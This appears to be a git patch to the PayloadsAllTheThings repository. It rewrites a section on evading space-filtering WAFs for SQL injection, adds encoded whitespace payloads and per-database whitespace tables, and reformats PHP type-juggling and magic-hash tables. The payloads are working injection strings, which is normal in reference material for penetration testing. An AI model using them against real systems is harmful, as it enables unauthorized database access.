From 7faf14a96008b719728768e161efc32a63ee8d57 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 26 Jul 2025 22:54:45 +0200 Subject: [PATCH] SQL injection - Generic Bypass (Space) --- README.md | 3 +-- SQL Injection/README.md | 49 +++++++++++++++++++++++------------------ Type Juggling/README.md | 11 +++++---- 3 files changed, 36 insertions(+), 27 deletions(-) diff --git a/README.md b/README.md index 9f5f8758..92fdf70d 100644 --- a/README.md +++ b/README.md @@ -2,9 +2,8 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! -I :heart: pull requests :) -You can also contribute with a :beers: IRL, or using the sponsor button +You can also contribute with a :beers: IRL, or using the sponsor button. [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 092d8136..1c284e7b 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -31,7 +31,7 @@ * [Second Order SQL Injection](#second-order-sql-injection) * [PDO Prepared Statements](#pdo-prepared-statements) * [Generic WAF Bypass](#generic-waf-bypass) - * [White Spaces](#white-spaces) + * [No Space Allowed](#no-space-allowed) * [No Comma Allowed](#no-comma-allowed) * [No Equal Allowed](#no-equal-allowed) * [Case Modification](#case-modification) @@ -439,30 +439,37 @@ PDO allows for binding of input parameters, which ensures that user data is prop ## Generic WAF Bypass -### White Spaces +### No Space Allowed -Bypass using whitespace alternatives. +Some web applications attempt to secure their SQL queries by blocking or stripping space characters to prevent simple SQL injection attacks. However, attackers can bypass these filters by using alternative whitespace characters, comments, or creative use of parentheses. -| Bypass | Technique | -| ------------------------ | ---------------------- | -| `?id=1%09and%091=1%09--` | Whitespace alternative | -| `?id=1%0Aand%0A1=1%0A--` | Whitespace alternative | -| `?id=1%0Band%0B1=1%0B--` | Whitespace alternative | -| `?id=1%0Cand%0C1=1%0C--` | Whitespace alternative | -| `?id=1%0Dand%0D1=1%0D--` | Whitespace alternative | -| `?id=1%A0and%A01=1%A0--` | Whitespace alternative | -| `?id=1%A0and%A01=1%A0--` | Whitespace alternative | +#### Alternative Whitespace Characters -| DBMS | ASCII characters in hexadecimal | -| ---------- | ------------------------------- | -| SQLite3 | 0A, 0D, 0C, 09, 20 | -| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | -| MySQL 3 | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 | -| PostgreSQL | 0A, 0D, 0C, 09, 20 | -| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | -| MSSQL | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 | +Most databases interpret certain ASCII control characters and encoded spaces (such as tabs, newlines, etc.) as whitespace in SQL statements. By encoding these characters, attackers can often evade space-based filters. -Bypass using comments and parenthesis. +| Example Payload | Description | +|-------------------------------|----------------------------------| +| `?id=1%09and%091=1%09--` | `%09` is tab (`\t`) | +| `?id=1%0Aand%0A1=1%0A--` | `%0A` is line feed (`\n`) | +| `?id=1%0Band%0B1=1%0B--` | `%0B` is vertical tab | +| `?id=1%0Cand%0C1=1%0C--` | `%0C` is form feed | +| `?id=1%0Dand%0D1=1%0D--` | `%0D` is carriage return (`\r`) | +| `?id=1%A0and%A01=1%A0--` | `%A0` is non-breaking space | + +**ASCII Whitespace Support by Database**: + +| DBMS | Supported Whitespace Characters (Hex) | +|--------------|----------------------------------------------___-| +| SQLite3 | 0A, 0D, 0C, 09, 20 | +| MySQL 5 | 09, 0A, 0B, 0C, 0D, A0, 20 | +| MySQL 3 | 01–1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0| +| PostgreSQL | 0A, 0D, 0C, 09, 20 | +| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 | +| MSSQL | 01–1F, 20 | + +#### Bypassing with Comments and Parentheses + +SQL allows comments and grouping, which can break up keywords and queries, thus defeating space filters: | Bypass | Technique | | ----------------------------------------- | -------------------- | diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 790af15a..1a6149ad 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -27,14 +27,14 @@ | `'0010e2' == '1e3'` | true | | `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | | `'0xABCdef' == ' 0xABCdef'` | true (PHP 5.0) / false (PHP 7.0) | -| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | +| `'0x01' == 1` | true (PHP 5.0) / false (PHP 7.0) | | `'0x1234Ab' == '1193131'` | true (PHP 5.0) / false (PHP 7.0) | | `'123' == 123` | true | | `'123a' == 123` | true | | `'abc' == 0` | true | | `'' == 0 == false == NULL` | true | | `'' == 0` | true | -| `0 == false` | true | +| `0 == false` | true | | `false == NULL` | true | | `NULL == ''` | true | @@ -65,7 +65,7 @@ Loose Type comparisons occurs in many languages: > Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations. | Hash | "Magic" Number / String | Magic Hash | Found By / Description | -| ---- | -------------------------- |:---------------------------------------------:| -------------:| +| ---- | -------------------------- | --------------------------------------------- | -------------| | MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | @@ -73,7 +73,10 @@ Loose Type comparisons occurs in many languages: | MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | -| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | + +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | +| ---- | -------------------------- | --------------------------------------------- | -------------| +| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Michael A. Cleverly, Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | | SHA-256 | TyNOQHUS | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |